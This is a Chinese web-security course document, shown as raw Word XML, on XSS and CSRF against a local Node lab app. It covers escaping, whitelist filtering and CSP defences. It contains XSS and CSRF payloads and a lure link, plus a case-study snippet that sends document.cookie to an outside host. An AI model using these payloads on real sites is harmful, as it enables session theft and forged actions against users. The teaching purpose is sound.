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WebInspect前后端漏洞分析与防御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课程介绍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（1）使用淘宝npm仓库下载安装nodemon后台监控，热启动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nodemon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（2）安装jspm包管理工具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jspm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（3）使用npm安装依赖，使用jspm安装模板依赖，启动，调试启动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ab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>WebInspect&gt;jspm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WebInspect&gt;npm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start dev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数据库相关配置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'localhost',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database: 'safety',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user: 'root',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password: '1234'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第03章 前端XSS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小试牛刀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（1）启动程序：npm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（2）测试是否正常启动：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（3）弹个窗：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http://localhost:1521/?from=&lt;script&gt;alert(1)&lt;/script&gt;Google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6207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（4）植入脚本：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>http://localhost:1521/?from=&lt;script src="https://code.jquery.com/jquery-3.2.1.min.js"&gt;&lt;/script&gt;Google</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4800600" cy="16954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原理：程序+数据=结果</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left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content:hello  =  &lt;div&gt;hello&lt;/div&gt;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:ind w:left="240" w:leftChars="100" w:firstLine="24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content:&lt;script&gt;alert(1)&lt;/script&gt;  = &lt;div&gt;&lt;script&gt;alert(1)&lt;/script&gt;&lt;/div&gt;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alert弹窗能上天？Scripting能干啥？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*获取页面数据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*获取Cookies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*劫持前端逻辑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*偷取网站任意数据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*偷取用户密码和登录态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*欺骗用户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（1）案例1：站酷搜索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src="https://saintcoder.duapp.com/joke/joke.js"&gt;&lt;/script&gt;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img = document.creatElement('img');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img.width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img.height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img.src = 'http:://saintcoder.duapp.com/joke/joke.php?joke=' + encodeURIComponent(document.cookie);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（2）案例2：QQ空间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把&lt;/script&gt;的反斜杠去掉，并且试图合并&lt;script&gt;&lt;script&gt;标签，但这里弄巧成拙。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==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&lt;script&gt;alert(1)//&lt;sCript&gt;&lt;/script&gt;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"" height="425" width="500" /&amp;gt;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&lt;script&gt;&lt;script&gt;alert(1)&lt;/script&gt;&lt;/script&gt;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（3）案例3：***商城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提交订单--&gt;后天订单系统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提交信息中包含脚本会怎么样？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取到后端管理者的登录态，Cookie，后台地址（HTTP_REFERER信息头）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这样就可以登录订单后台的系统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XSS攻击分类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反射型：url直接注入；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存储型：存储到DB读取时注入；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URL传播时如果包含script脚本 ，容易让人产生怀疑。这时传播者多会使用短网址，给别人进行访问。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短网址：https://dwz.cn/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http://localhost:1521/?from=%3Cscript%3Ealert(1)%3C/script%3EGoogle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"https://dwz.cn/2zGYyXUL"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https://dwz.cn/2zGYyXUL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（1）XSS攻击注入点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*HTML节点内容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*富文本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http://localhost:1521/?avatarId=1%22%20onload=alert(1)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src="/image/1" onerror="alert(1)"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5000625" cy="157162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9475"/>
            <wp:effectExtent l="0" t="0" r="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theme="minorBidi"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>3）JavaScript代码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http://localhost:1521/?from=Google%22;alert(1);%22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from = "Google";alert(1);"";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 System.import('scripts/login');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647950"/>
            <wp:effectExtent l="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&lt;p&gt;这是&lt;span style=\"border: medium none; color: rgb(255, 0, 0);\"&gt;一段&lt;/span&gt;&lt;em&gt;&lt;strong&gt;富文本&lt;/strong&gt;&lt;/em&gt;&lt;span style=\"font-size: 18px;\"&gt;信息&lt;/span&gt;&lt;br/&gt;&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="1790700" cy="108585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6764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匿名用户 2019-05-02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这是一段富文本信息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*得保留HTML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*HTML就有XSS攻击风险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浏览器自带防御：Google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关闭：ctx.set('X-XSS-Protection',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http://localhost:1521/?from=%3Cscript%3Ealert(1)%3C/script%3EGoogle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6115"/>
            <wp:effectExtent l="0" t="0" r="508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打开：// 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无法连接在JavaScript代码中的XSS攻击，浏览器的拦截相对有限，只能拦截HTML内容、属性的反射型XSS攻击，并不是所有浏览器都支持；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"http://localhost:1521/?from=Google%22;alert(1);%22"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http://localhost:1521/?from=Google%22;alert(1);%22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19700" cy="153352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XSS攻击防御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HTML节点内容XSS攻击防御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http://localhost:1521/?from=&lt;script&gt;alert(1)&lt;/script&gt;Google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1692275"/>
            <wp:effectExtent l="0" t="0" r="508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并不希望破坏url的内容，可以采用转义：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(!str) return '';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查看html实体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str.replace(/&amp;/g, '&amp;amp;');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str.replace(/"/g, '&amp;quto;');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str.replace(/'/g, '&amp;#39;');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空格一般无需转义，但html内容要加双引号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 /g, '&amp;#32;');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src='/image/!{avatarId}'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"http://localhost:1521/?avatarId=1%27%20onerror=%27alert(1)"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http://localhost:1521/?avatarId=1%27%20onerror=%27alert(1)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src=/image/!{avatarId}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"http://localhost:1521/?avatarId=1%20onerror=alert(1)"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http://localhost:1521/?avatarId=1%20onerror=alert(1)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JavaScript代码XSS攻击防御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"http://localhost:1521/?fromForJs=Google%22;alert(1);%22"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http://localhost:1521/?fromForJs=Google%22;alert(1);%22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escapeForJs = function (str)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if(!str) return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str.replace(/\\/g, '\\\\');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str.replace(/"/g, '\\"');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fromForJs:  JSON.stringify(ctx.query.from) ||  '',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"http://localhost:1521/?fromForJs=Google/%22;alert(1);/"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http://localhost:1521/?fromForJs=Google\%22;alert(1);//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400550" cy="1362075"/>
            <wp:effectExtent l="0" t="0" r="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1628775"/>
            <wp:effectExtent l="0" t="0" r="0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按白名单保留部分标签和属性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在评论中添加：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&lt;font color=\"red\"&gt;这是红色字&lt;/font&gt;&lt;br&gt;&lt;script&gt;document.write('XSS')&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="2085975" cy="1238250"/>
            <wp:effectExtent l="0" t="0" r="952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&lt;a href="javascript:alert(1)"&gt;你好&lt;/a&gt; 替换后 &lt;a href=""&gt;你好&lt;/a&gt;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src=\"abc\" onerror=\"alert(1)\"&gt; 替换后 &lt;img src="abc"&gt;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comments.forEach(function(comment) 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comment.content = xssFilterByJSXSS(comment.content);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});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"https://github.com/cheeriojs/cheerio"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https://github.com/cheeriojs/cheerio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cheerio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1. 采用黑名单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html.replace(/&lt;\s*\/?script\s*&gt;/g,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html.replace(/javascript:[^'"']*/g,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html.replace(/onerror\s*=\s*['"]?[^'"]*['"]?/g,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2. 采用cheerio白名单拦截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'cheerio'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'img'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'font'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'head'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each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_index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console.log('this is elem:', elem);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1==&gt;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attribs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=== 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//console.log(elem.name, attr);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2==&gt;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3==&gt;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直接使用xss工具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xss = require("xss");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xss('&lt;script&gt;alert("xss");&lt;/script&gt;');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console.log(html);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"https://github.com/leizongmin/js-xss"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https://github.com/leizongmin/js-xss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xss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（4）CSP内容安全策略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Security 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内容安全策略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用于指定哪些内容可执行</w:t>
      </w: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child-src content-src default-src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font-src frame-src img-src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manifest-src media-src object-src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script-src style-src worker-src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&lt;host-source&gt; &lt;schema-source&gt; 'self'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'unsafe-inline' 'unsafe-eval' 'none'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'nonce-&lt;base64-value&gt;' &lt;hash-source&gt;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'strict-dynamic'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http://localhost:1521/?from=%3Cscript%3Ealert(1)%3C/script%3EGoogle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ctx.set(`Content-Security-Policy`, `default-src 'self'`);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inline-script脚本将不执行，只要同源才能够允许访问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Refused to execute inline script because it violates the following Content Security Policy directive: "default-src 'self'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"http://security-imooc.toobug.net\"."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http://security-imooc.toobug.net".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第04章 前端CSRF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*Cross Site Request Forgy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*跨站请求伪造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小试牛刀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登录后评论.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打开other/csrf.html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发现评论多了一条来自CSRF的记录。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router.get('/ajax/addComment', site.addComment);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if(ctx.request.method === 'post'){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ctx.request.query;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"http://localhost:1521/ajax/addComment?postId=1&amp;content=这是来自get请求的评论"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http://localhost:1521/ajax/addComment?postId=1&amp;content=这是来自get请求的评论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发现评论多了一条这是来自get请求的评论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1700" cy="10763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href="http://localhost:1521/ajax/addComment?postId=1&amp;content=这是来自get请求的评论"&gt;点击这里有钱拿&lt;/a&gt;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src="http://localhost:1521/ajax/addComment?postId=1&amp;content=&lt;a href=file:///E:\BaiduYunDownload\csrf.html target='_blank'&gt;点击这里有钱拿&lt;/a&gt;" /&gt;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1019175"/>
            <wp:effectExtent l="0" t="0" r="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1B859"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="DDA1B859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2B5397"/>
    <w:rsid w:val="034D2C77"/>
    <w:rsid w:val="035D64F8"/>
    <w:rsid w:val="03A63585"/>
    <w:rsid w:val="03D076ED"/>
    <w:rsid w:val="03D63094"/>
    <w:rsid w:val="04222A58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8D041E3"/>
    <w:rsid w:val="09126B87"/>
    <w:rsid w:val="09133D41"/>
    <w:rsid w:val="09447E3A"/>
    <w:rsid w:val="094F7A82"/>
    <w:rsid w:val="0972091C"/>
    <w:rsid w:val="09992F18"/>
    <w:rsid w:val="099C6A13"/>
    <w:rsid w:val="09B04332"/>
    <w:rsid w:val="09C32849"/>
    <w:rsid w:val="09C509A3"/>
    <w:rsid w:val="0A482F60"/>
    <w:rsid w:val="0A4F4FC9"/>
    <w:rsid w:val="0A8911E8"/>
    <w:rsid w:val="0A9B3693"/>
    <w:rsid w:val="0AA14FAF"/>
    <w:rsid w:val="0AE1648F"/>
    <w:rsid w:val="0BC628B3"/>
    <w:rsid w:val="0BEB1281"/>
    <w:rsid w:val="0BF33C52"/>
    <w:rsid w:val="0C134C5F"/>
    <w:rsid w:val="0C210116"/>
    <w:rsid w:val="0C2217C1"/>
    <w:rsid w:val="0C4D7E11"/>
    <w:rsid w:val="0C7A416C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0FE13CAF"/>
    <w:rsid w:val="103566E8"/>
    <w:rsid w:val="10422A7E"/>
    <w:rsid w:val="10494C72"/>
    <w:rsid w:val="10AA416E"/>
    <w:rsid w:val="11AB2991"/>
    <w:rsid w:val="11D71FF3"/>
    <w:rsid w:val="11F801A1"/>
    <w:rsid w:val="11FF086A"/>
    <w:rsid w:val="124B3CFF"/>
    <w:rsid w:val="125C718B"/>
    <w:rsid w:val="128C58C5"/>
    <w:rsid w:val="12995364"/>
    <w:rsid w:val="129C5218"/>
    <w:rsid w:val="129C7739"/>
    <w:rsid w:val="12F361E7"/>
    <w:rsid w:val="13251BB6"/>
    <w:rsid w:val="13287DBD"/>
    <w:rsid w:val="132D3E85"/>
    <w:rsid w:val="13332054"/>
    <w:rsid w:val="13641191"/>
    <w:rsid w:val="13A20F0E"/>
    <w:rsid w:val="13F57749"/>
    <w:rsid w:val="142A3D09"/>
    <w:rsid w:val="143A50AB"/>
    <w:rsid w:val="143E1DA6"/>
    <w:rsid w:val="14560230"/>
    <w:rsid w:val="145B65F3"/>
    <w:rsid w:val="1480694B"/>
    <w:rsid w:val="14887FD4"/>
    <w:rsid w:val="14A768EB"/>
    <w:rsid w:val="14B01CEE"/>
    <w:rsid w:val="14FD5014"/>
    <w:rsid w:val="152D53CE"/>
    <w:rsid w:val="15375BD8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450198"/>
    <w:rsid w:val="174B363B"/>
    <w:rsid w:val="179B121F"/>
    <w:rsid w:val="17AE3A6E"/>
    <w:rsid w:val="17EB12A6"/>
    <w:rsid w:val="181B2234"/>
    <w:rsid w:val="182E79D0"/>
    <w:rsid w:val="189C3B6C"/>
    <w:rsid w:val="18C869AC"/>
    <w:rsid w:val="18DA53D7"/>
    <w:rsid w:val="18E43B5F"/>
    <w:rsid w:val="1939156B"/>
    <w:rsid w:val="196066A5"/>
    <w:rsid w:val="19723A49"/>
    <w:rsid w:val="197A6E7E"/>
    <w:rsid w:val="1988485E"/>
    <w:rsid w:val="19A23CA8"/>
    <w:rsid w:val="19CE3246"/>
    <w:rsid w:val="1A464070"/>
    <w:rsid w:val="1A4D67F6"/>
    <w:rsid w:val="1A5E6836"/>
    <w:rsid w:val="1AAB2F47"/>
    <w:rsid w:val="1AEF10F8"/>
    <w:rsid w:val="1B1F417B"/>
    <w:rsid w:val="1B323CC5"/>
    <w:rsid w:val="1BBD70C9"/>
    <w:rsid w:val="1BEB1435"/>
    <w:rsid w:val="1BF5486F"/>
    <w:rsid w:val="1C202C0F"/>
    <w:rsid w:val="1C297A7C"/>
    <w:rsid w:val="1C2C44BD"/>
    <w:rsid w:val="1C9347DA"/>
    <w:rsid w:val="1CBD6334"/>
    <w:rsid w:val="1CC457A0"/>
    <w:rsid w:val="1D183258"/>
    <w:rsid w:val="1D6D4805"/>
    <w:rsid w:val="1DBC5F8E"/>
    <w:rsid w:val="1E0508E7"/>
    <w:rsid w:val="1E252706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A0481B"/>
    <w:rsid w:val="20D60C33"/>
    <w:rsid w:val="2169126A"/>
    <w:rsid w:val="216D3A00"/>
    <w:rsid w:val="218B2A65"/>
    <w:rsid w:val="21E54DE1"/>
    <w:rsid w:val="21F10FF4"/>
    <w:rsid w:val="21F5197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8F84A30"/>
    <w:rsid w:val="290C4A1C"/>
    <w:rsid w:val="29795082"/>
    <w:rsid w:val="29D15459"/>
    <w:rsid w:val="2A1C4EB5"/>
    <w:rsid w:val="2A8A2A64"/>
    <w:rsid w:val="2A8D6D29"/>
    <w:rsid w:val="2AF47D8D"/>
    <w:rsid w:val="2AF72D48"/>
    <w:rsid w:val="2B1E7639"/>
    <w:rsid w:val="2B54399E"/>
    <w:rsid w:val="2B817054"/>
    <w:rsid w:val="2B952064"/>
    <w:rsid w:val="2B9953F9"/>
    <w:rsid w:val="2BA47C32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DC00ED8"/>
    <w:rsid w:val="2DCF214B"/>
    <w:rsid w:val="2E3E7372"/>
    <w:rsid w:val="2E7B57FD"/>
    <w:rsid w:val="2ECA492D"/>
    <w:rsid w:val="2EEC298E"/>
    <w:rsid w:val="2F206AAC"/>
    <w:rsid w:val="2F217D55"/>
    <w:rsid w:val="2F69589D"/>
    <w:rsid w:val="2F6C70B4"/>
    <w:rsid w:val="2F992CCA"/>
    <w:rsid w:val="2FB603B5"/>
    <w:rsid w:val="2FDA4C35"/>
    <w:rsid w:val="30491F24"/>
    <w:rsid w:val="30604753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C7C4E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6902C3"/>
    <w:rsid w:val="37DB4CD3"/>
    <w:rsid w:val="380538F7"/>
    <w:rsid w:val="382D4928"/>
    <w:rsid w:val="385C3810"/>
    <w:rsid w:val="386456C1"/>
    <w:rsid w:val="38D031A5"/>
    <w:rsid w:val="390F2291"/>
    <w:rsid w:val="396F16E0"/>
    <w:rsid w:val="398474E6"/>
    <w:rsid w:val="39D3062E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BA4856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3FE72A76"/>
    <w:rsid w:val="402A5FB4"/>
    <w:rsid w:val="402C6DD1"/>
    <w:rsid w:val="40360AC4"/>
    <w:rsid w:val="40422B6A"/>
    <w:rsid w:val="4049748D"/>
    <w:rsid w:val="405E3772"/>
    <w:rsid w:val="40802FE6"/>
    <w:rsid w:val="409B7807"/>
    <w:rsid w:val="40C01499"/>
    <w:rsid w:val="41176306"/>
    <w:rsid w:val="412944E7"/>
    <w:rsid w:val="4137693B"/>
    <w:rsid w:val="415623C8"/>
    <w:rsid w:val="416E501A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6C0FF4"/>
    <w:rsid w:val="4688377E"/>
    <w:rsid w:val="46B85C2C"/>
    <w:rsid w:val="471F13CD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68735D"/>
    <w:rsid w:val="48AD582C"/>
    <w:rsid w:val="48AE046B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EF845B0"/>
    <w:rsid w:val="4FE86C97"/>
    <w:rsid w:val="4FFC26A2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35B54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15B99"/>
    <w:rsid w:val="549768A7"/>
    <w:rsid w:val="54EB30AE"/>
    <w:rsid w:val="54FE53DB"/>
    <w:rsid w:val="55934394"/>
    <w:rsid w:val="55F47F8C"/>
    <w:rsid w:val="55FA3D05"/>
    <w:rsid w:val="560A25FC"/>
    <w:rsid w:val="56131D8D"/>
    <w:rsid w:val="562721DD"/>
    <w:rsid w:val="56523F33"/>
    <w:rsid w:val="56A0735A"/>
    <w:rsid w:val="56F509CA"/>
    <w:rsid w:val="571267C8"/>
    <w:rsid w:val="57301611"/>
    <w:rsid w:val="5779701D"/>
    <w:rsid w:val="57822759"/>
    <w:rsid w:val="57D01CCB"/>
    <w:rsid w:val="57EC10D9"/>
    <w:rsid w:val="581A473F"/>
    <w:rsid w:val="58591160"/>
    <w:rsid w:val="58BA4314"/>
    <w:rsid w:val="58C40666"/>
    <w:rsid w:val="58C50AA7"/>
    <w:rsid w:val="58D0339B"/>
    <w:rsid w:val="58D3007E"/>
    <w:rsid w:val="58D624CB"/>
    <w:rsid w:val="58E44E30"/>
    <w:rsid w:val="58EC446E"/>
    <w:rsid w:val="59015FAC"/>
    <w:rsid w:val="59152ECE"/>
    <w:rsid w:val="597C1C25"/>
    <w:rsid w:val="5980130F"/>
    <w:rsid w:val="5A1E68BC"/>
    <w:rsid w:val="5A5945EC"/>
    <w:rsid w:val="5A6A7C12"/>
    <w:rsid w:val="5AFD7347"/>
    <w:rsid w:val="5B4D47F7"/>
    <w:rsid w:val="5B4E1DE9"/>
    <w:rsid w:val="5B5E5B34"/>
    <w:rsid w:val="5B756F34"/>
    <w:rsid w:val="5B894A73"/>
    <w:rsid w:val="5B8962E2"/>
    <w:rsid w:val="5B9E419F"/>
    <w:rsid w:val="5BB97E88"/>
    <w:rsid w:val="5BD7667F"/>
    <w:rsid w:val="5BEB1487"/>
    <w:rsid w:val="5BEE76CD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1843BF"/>
    <w:rsid w:val="63245BF5"/>
    <w:rsid w:val="638518CD"/>
    <w:rsid w:val="63D86FC9"/>
    <w:rsid w:val="63E35B0C"/>
    <w:rsid w:val="63EF427A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7F064D3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037C9E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062AAB"/>
    <w:rsid w:val="6F364049"/>
    <w:rsid w:val="6F8264F7"/>
    <w:rsid w:val="6FC74943"/>
    <w:rsid w:val="70334BD3"/>
    <w:rsid w:val="70B25EC1"/>
    <w:rsid w:val="70FD406F"/>
    <w:rsid w:val="711F2013"/>
    <w:rsid w:val="71837AD8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3FB326B"/>
    <w:rsid w:val="7457535D"/>
    <w:rsid w:val="74CE7FB6"/>
    <w:rsid w:val="74EA3ABE"/>
    <w:rsid w:val="750544A8"/>
    <w:rsid w:val="751B0A9F"/>
    <w:rsid w:val="752B2BA9"/>
    <w:rsid w:val="75371FA5"/>
    <w:rsid w:val="753F1144"/>
    <w:rsid w:val="754A1F2F"/>
    <w:rsid w:val="75527C52"/>
    <w:rsid w:val="76283C01"/>
    <w:rsid w:val="76BE37A6"/>
    <w:rsid w:val="76E36BD7"/>
    <w:rsid w:val="76F12385"/>
    <w:rsid w:val="76FC1899"/>
    <w:rsid w:val="77006B2E"/>
    <w:rsid w:val="77363C4C"/>
    <w:rsid w:val="777C44FE"/>
    <w:rsid w:val="77864943"/>
    <w:rsid w:val="77A74C50"/>
    <w:rsid w:val="77E5304C"/>
    <w:rsid w:val="77ED01BA"/>
    <w:rsid w:val="785037F0"/>
    <w:rsid w:val="785E5477"/>
    <w:rsid w:val="78733DF6"/>
    <w:rsid w:val="78824639"/>
    <w:rsid w:val="788376CA"/>
    <w:rsid w:val="78874AE8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4047D"/>
    <w:rsid w:val="7A481E86"/>
    <w:rsid w:val="7A5916FE"/>
    <w:rsid w:val="7A674640"/>
    <w:rsid w:val="7A96055C"/>
    <w:rsid w:val="7AB82B63"/>
    <w:rsid w:val="7AC5313C"/>
    <w:rsid w:val="7AD322D9"/>
    <w:rsid w:val="7B094F18"/>
    <w:rsid w:val="7B1F756A"/>
    <w:rsid w:val="7B4545D8"/>
    <w:rsid w:val="7B4C290E"/>
    <w:rsid w:val="7B8134E9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A01071"/>
    <w:rsid w:val="7CC26ED1"/>
    <w:rsid w:val="7CFF6FAB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AF3193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2019-05-14T15:02:54Z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